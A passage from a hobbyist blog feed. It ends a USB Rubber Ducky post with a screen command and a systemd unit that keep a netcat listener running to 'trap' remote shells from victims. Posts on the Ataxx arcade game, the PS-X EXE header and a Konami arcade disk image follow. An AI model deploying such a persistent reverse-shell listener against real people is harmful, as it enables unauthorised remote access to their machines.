<p>The <code class="language-plaintext highlighter-rouge">hax0r.tty</code> is just a random name that I used to refer to the screen later,
when I want to see if I have someone trapped in my remote shell. Running this
command will attach me to the screen running the <code class="language-plaintext highlighter-rouge">netcat</code> listener, allowing me
to access the remote shell (if any).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>screen -r hax0r.tty
</code></pre></div></div>

<p>Finally, here’s a <code class="language-plaintext highlighter-rouge">systemd</code> unit that I used to start the <code class="language-plaintext highlighter-rouge">screen</code> daemon on
bootup.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=shell trapping service

[Service]
User=zanneth
Group=zanneth
ExecStart=/usr/bin/screen -DmS hax0r.tty /bin/nc -l -p 5730
Restart=always

[Install]
WantedBy=multi-user.target
</code></pre></div></div>

<p>Because I’m using the <code class="language-plaintext highlighter-rouge">Restart=always</code> option, I can terminate any shells that I
have trapped on my server, and <code class="language-plaintext highlighter-rouge">systemd</code> will automatically restart the screen
daemon again, waiting for the next victim.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[I just bought this tiny USB microcontroller called the USB Rubber Ducky from Hak5. It’s a really nifty piece of hardware that acts like a USB keyboard when plugged into a computer. Since it’s totally programmable, you can use the Rubber Ducky to type in whatever you want into the host machine as soon as it is plugged in.]]></summary></entry><entry><title type="html">Ataxx Arcade Game</title><link href="/2019/03/25/ataxx-arcade-game.html" rel="alternate" type="text/html" title="Ataxx Arcade Game" /><published>2019-03-25T22:30:00+00:00</published><updated>2019-03-25T22:30:00+00:00</updated><id>/2019/03/25/ataxx-arcade-game</id><content type="html" xml:base="/2019/03/25/ataxx-arcade-game.html"><![CDATA[<p><em>Ataxx</em> is a very cool arcade game that I saw at Arcade Expo this year in
Banning, CA. It’s a multiplayer puzzle game that is similar in appearance to
Reversi, using colored pieces with one color per player.</p>

<p>It has very simple rules that pretty quickly lead to fun strategies for eventual
domination of the game board. Players occupy a seven-by-seven square grid and
take turns moving pieces. The player can move diagonal or orthogonal, moving
either two places or one. If the player moves one place, the piece duplicates
and occupies both the source and the destination. If the player moves two
places, the piece moves without duplicating. When a piece is moved, adjacent
squares that are occupied by the opponent are flipped to become the player’s
color. The winning condition is to occupy as many squares as possible by the end
of the game.</p>

<p>The graphics and sound in the game are really cool. It has this “underground
sewer” type of aesthetic that is consistent throughout. AI characters that the
player battles are mutant alien lifeforms that react according to the player’s
actions and other game state. This character battle art style reminds me a lot
of Pop’n Music, where the player chooses a character to play in the beginning
and battles another character during each song.</p>

<p>The game uses a trackball for input, allowing the player to move a cursor around
on the screen to select the next piece to move. If a version of this game were
being created today, a large touchscreen interface would be a much superior way
to play the game.</p>

<p><img src="/assets/img/ataxx/ataxx-cabinet.jpeg" alt="Ataxx Cabinet" /></p>

<p><img src="/assets/img/ataxx/ataxx-gameplay.jpeg" alt="Ataxx Gameplay" /></p>]]></content><author><name></name></author><summary type="html"><![CDATA[Ataxx is a very cool arcade game that I saw at Arcade Expo this year in Banning, CA. It’s a multiplayer puzzle game that is similar in appearance to Reversi, using colored pieces with one color per player.]]></summary></entry><entry><title type="html">PS-X EXE File Format</title><link href="/2018/11/02/psx-exe-file-format.html" rel="alternate" type="text/html" title="PS-X EXE File Format" /><published>2018-11-02T00:45:00+00:00</published><updated>2018-11-02T00:45:00+00:00</updated><id>/2018/11/02/psx-exe-file-format</id><content type="html" xml:base="/2018/11/02/psx-exe-file-format.html"><![CDATA[<p>The executable format for PSX game consoles is different from standard PE or ELF executable formats. The PSX runtime library expects executable files to be in a specific structure that is outlined in the runtime library reference document.</p>

<p>The first <code class="language-plaintext highlighter-rouge">0x800</code> bytes comprise a standard header format, which is immediately followed by the <code class="language-plaintext highlighter-rouge">TEXT</code> section of the binary.</p>

<p>The header format is as follows. All multi-byte numerical addresses are <strong>little-endian</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x000 [8 bytes]  = "PS-X EXE" (magicnum)
0x010 [4 bytes]  = execution start address
0x018 [4 bytes]  = starting address of TEXT section
0x01C [4 bytes]  = size of text section
0x030 [4 bytes]  = stack ($sp) start address
0x04C [variable] = "Sony Computer Entertainment Inc. for North America area" 
(region-specific)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">TEXT</code> section must be stored at an address which is a multiple of 2048 bytes.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[The executable format for PSX game consoles is different from standard PE or ELF executable formats. The PSX runtime library expects executable files to be in a specific structure that is outlined in the runtime library reference document.]]></summary></entry><entry><title type="html">KONAMI Arcade Image Data</title><link href="/2015/05/04/konami-game-data.html" rel="alternate" type="text/html" title="KONAMI Arcade Image Data" /><published>2015-05-04T01:36:00+00:00</published><updated>2015-05-04T01:36:00+00:00</updated><id>/2015/05/04/konami-game-data</id><content type="html" xml:base="/2015/05/04/konami-game-data.html"><![CDATA[<p>The following are notes collected from a deep-dive investigation into a hard-disk image that was shipped from Japan. The image appears to have come from the original manufacturer unmodified.</p>

<p>This investigation does not cover any information about reverse-engineering the game binaries or decrypting the game data.</p>

<p>Research performed on <em>SPADA</em> (iidx21) legitimate hardware unless mentioned otherwise.</p>

<h2 id="usb-keys">USB Keys</h2>

<p>The USB security keys are attached to the back of the machine via a two-port USB hub. They are <strong>iKey 2032 Two-Factor USB Authentication Tokens</strong>. One appears to be used for decrypting game data and executable files (“LICENSE KEY”), while the other appears to be used for verifying <em>e-AMUSEMENT</em> participation with Konami servers (“ACCOUNT KEY”).</p>

<p><img src="/assets/project-assets/konami-image-data/img/USBSecurityKeys_Front.jpg" alt="USB Security Keys (Front)" width="150px" />
<img src="/assets/project-assets/konami-image-data/img/USBSecurityKeys_Back.jpg" alt="USB Security Keys (Back)" /></p>

<p>The security keys are protected with a passphrase that is presumably hard-coded in the game executable or operating system config files. The iKey driver will lock out access to the security key if too many failed attempts at the passphrase are detected.</p>

<p><img src="/assets/project-assets/konami-image-data/img/PassphraseWarning.png" alt="Passphrase Warning" /></p>

<p><strong>LICENSE KEY</strong></p>

<p>Utility can access <em>KONAMI</em> root CA and public signing key. Utility output can be viewed <a href="/assets/project-assets/konami-image-data/LDJ_LicenseKey_Spada.txt" title="License Key Datakey Utility Output">here</a>.</p>

<h2 id="hard-disk">Hard Disk</h2>

<p>The hard disk used is a WD 320GB 2.5” drive with the following label on it: <code class="language-plaintext highlighter-rouge">LDJ-JA beatmania IIDX20</code>. Presumably the drive that I have was included in a Tricoro (iidx20) kit, and at some point the contents were upgraded to SPADA without replacing the original HDD.</p>

<p><img src="/assets/project-assets/konami-image-data/img/IIDX21HDD.jpg" alt="IIDX21 HDD" /></p>

<h2 id="drive-content">Drive Content</h2>

<p>The drive contains a mixture of encrypted and unencrypted data. All of the game data, shared libraries, and executable files are encrypted.</p>

<p>The directory structure of the <code class="language-plaintext highlighter-rouge">LDJ</code> directory (where game content is stored) differs between the stock installation and the one distributed by <em>programmedworld</em>.</p>

<p><a href="/assets/project-assets/konami-image-data/iidx21_stock_LDJ_tree.txt" title="Stock LDJ Directory Structure">Stock LDJ Directory Structure</a></p>

<p><a href="/assets/project-assets/konami-image-data/iidx21_programmedworld_LDJ_tree.txt" title="programmedworld LDJ Directory Structure"><em>programmedworld</em> LDJ Directory Structure</a></p>

<ul>
  <li>C:
    <ul>
      <li>OS partition. Contains program files, windows dir, etc.</li>
      <li><code class="language-plaintext highlighter-rouge">000ROM.txt</code>
        <ul>
          <li>Contains single string: “LDJ-JA-A01 2012-03-22 0”</li>
          <li>Possibly metadata about the game version contained on the hard drive</li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">boot.ini</code>
        <ul>
          <li>Windows configuration file with options related to loading operating system data.</li>
          <li><code class="language-plaintext highlighter-rouge">
  [boot loader]
  timeout=0
  default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  [operating systems]
  multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Embedded" /fastdetect /bootlogo /noguiboot</code></li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">NTDETECT.COM</code></li>
      <li><code class="language-plaintext highlighter-rouge">ntldr</code></li>
      <li><code class="language-plaintext highlighter-rouge">WERUNTIME.INI</code>
        <ul>
          <li><em>not sure what this is</em></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>D:
    <ul>
      <li>Game data partition</li>
      <li><code class="language-plaintext highlighter-rouge">LDJ</code>
        <ul>
          <li>Main game data directory</li>
          <li>Encrypted</li>
          <li>Contains <code class="language-plaintext highlighter-rouge">contents</code> and <code class="language-plaintext highlighter-rouge">path.lst</code></li>
          <li><code class="language-plaintext highlighter-rouge">path.lst</code>
            <ul>
              <li>CSV list of all files</li>
              <li>Purpose/meaning not clear</li>
            </ul>
          </li>
          <li><code class="language-plaintext highlighter-rouge">contents</code>
            <ul>
              <li>Game data and encrypted executable code (dlls)</li>
              <li>Organized into hexadecimally numbered subdirectories (0, 1…, a, b)</li>
              <li>Contains: <code class="language-plaintext highlighter-rouge">dev</code>, <code class="language-plaintext highlighter-rouge">modules</code>, <code class="language-plaintext highlighter-rouge">prop</code>, <code class="language-plaintext highlighter-rouge">allfiles.lst</code></li>
              <li><code class="language-plaintext highlighter-rouge">allfiles.lst</code>
                <ul>
                  <li>Encrypted. Probably the same CSV file format as <code class="language-plaintext highlighter-rouge">path.lst</code></li>
                </ul>
              </li>
              <li><code class="language-plaintext highlighter-rouge">dev</code>
                <ul>
                  <li>Appears to be application’s cache directory</li>
                  <li>Contains log files, binary caches, XML files for bookkeeping, etc.</li>
                  <li>All encrypted</li>
                </ul>
              </li>
              <li><code class="language-plaintext highlighter-rouge">modules</code>
                <ul>
                  <li>Shared libraries and executable files</li>
                  <li>Encrypted</li>
                </ul>
              </li>
              <li><code class="language-plaintext highlighter-rouge">prop</code>
                <ul>
                  <li>XML files for bootstrapping</li>
                  <li>Two “p7s” files
                    <ul>
                      <li><code class="language-plaintext highlighter-rouge">trustcerts.p7s</code></li>
                      <li><code class="language-plaintext highlighter-rouge">trustfiles.p7s</code>
                        <blockquote>
                          <p>P7S file usually contains DER encoded CMS (Cryptographic Message Syntax) structure of SignedData type which is defined in RFC5652. You can use ASN.1 Editor to conveniently examine exact structure and contents of your file.</p>
                        </blockquote>
                      </li>
                    </ul>
                  </li>
                  <li>Encrypted</li>
                </ul>
              </li>
            </ul>
          </li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">factory</code>
        <ul>
          <li>Utility programs and shared libraries for factory testing?</li>
          <li><code class="language-plaintext highlighter-rouge">systemLDJ.exe</code>
            <ul>
              <li>Likely a factory test executable</li>
              <li>Not encrypted</li>
            </ul>
          </li>
          <li><code class="language-plaintext highlighter-rouge">wave</code>
            <ul>
              <li>Sound files that play a single tone in the key corresponding to the filename (e.g. “C.wav” plays a tone in the key of C)</li>
              <li>4 files in total (<code class="language-plaintext highlighter-rouge">C.wav</code>, <code class="language-plaintext highlighter-rouge">D.wav</code>, <code class="language-plaintext highlighter-rouge">E.wav</code>, <code class="language-plaintext highlighter-rouge">F.wav</code>)</li>
            </ul>
          </li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">d3dx9_24.dll</code></li>
      <li><code class="language-plaintext highlighter-rouge">D3DX9_41.dll</code>
        <ul>
          <li>Unencrypted builds of the DirectX library</li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">existd</code>
        <ul>
          <li>Empty file presumably indicating the existence of the drive without depending on drive letter matching</li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">factory.bat</code>
        <ul>
          <li>Script that runs the factory test executable store in <code class="language-plaintext highlighter-rouge">factory</code></li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">infodisp.exe</code>
        <ul>
          <li>Looks to be a standalone program used to display error messages in a dialog box</li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">select.bat</code>
        <ul>
          <li>Script that bootstraps the game application</li>
          <li>Error messages localized to Japanese</li>
          <li>Full contents of this script (converted from ShiftJIS to unicode) can be accessed <a href="/assets/project-assets/konami-image-data/select_unicode.bat" title="select.bat">here</a></li>
        </ul>

        <ol>
          <li>Runs <code class="language-plaintext highlighter-rouge">update.exe</code></li>
          <li>Sets up environment variables (mostly paths to resource files)</li>
          <li>Creates cache directories if non-existent</li>
          <li>Pings localhost 30 times? (redirects output to <code class="language-plaintext highlighter-rouge">nul</code>)
            <ul>
              <li>Comment says “ドライバが安定するまで 30 秒ほど待機する”, which translates to “the driver will wait about 30 seconds to stabalize”. Sounds like a hack to workaround some bug in the iKey software.</li>
            </ul>
          </li>
          <li>Runs <code class="language-plaintext highlighter-rouge">bootstrap.exe</code> with the following arguments
            <ul>
              <li><code class="language-plaintext highlighter-rouge">prop\bootstrap.xml</code></li>
              <li><code class="language-plaintext highlighter-rouge">bm2dx_drm</code></li>
              <li><code class="language-plaintext highlighter-rouge">prop\trustcerts.p7s</code></li>
              <li><code class="language-plaintext highlighter-rouge">prop\trustfiles.p7s</code></li>
            </ul>
          </li>
          <li>Displays an error code if one was set by <code class="language-plaintext highlighter-rouge">bootstrap</code></li>
          <li>If <code class="language-plaintext highlighter-rouge">bootstrap</code> returns a code of 0, the machine shuts down</li>
        </ol>
      </li>
      <li><code class="language-plaintext highlighter-rouge">update.exe</code>
        <ul>
          <li>Unencrypted</li>
          <li>Presumably contacts update server to check for updates before running <code class="language-plaintext highlighter-rouge">bootstrap</code></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>E:
    <ul>
      <li>Partition that acts as a staging area for game updates</li>
      <li><code class="language-plaintext highlighter-rouge">UP</code>
        <ul>
          <li><code class="language-plaintext highlighter-rouge">JAA2013100200</code>
            <ul>
              <li>Looks to be an update that was downloaded while this kit was active on the <em>e-AMUSEMENT</em> network in Japan</li>
              <li>Contains <code class="language-plaintext highlighter-rouge">contents</code> (same dir structure as <code class="language-plaintext highlighter-rouge">LDJ\contents</code>), <code class="language-plaintext highlighter-rouge">LDJ131008.bsv.bak</code>, and <code class="language-plaintext highlighter-rouge">path.lst</code></li>
              <li>Basically an LDJ folder that is merged with the existing one</li>
              <li><code class="language-plaintext highlighter-rouge">.bsv</code> file is probably a signature file for verifying contents</li>
            </ul>
          </li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">existe</code>
        <ul>
          <li>Same purpose as <code class="language-plaintext highlighter-rouge">existd</code></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>F:
    <ul>
      <li>Empty except for <code class="language-plaintext highlighter-rouge">existf</code></li>
    </ul>
  </li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[The following are notes collected from a deep-dive investigation into a hard-disk image that was shipped from Japan. The image appears to have come from the original manufacturer unmodified.]]></summary></entry></feed>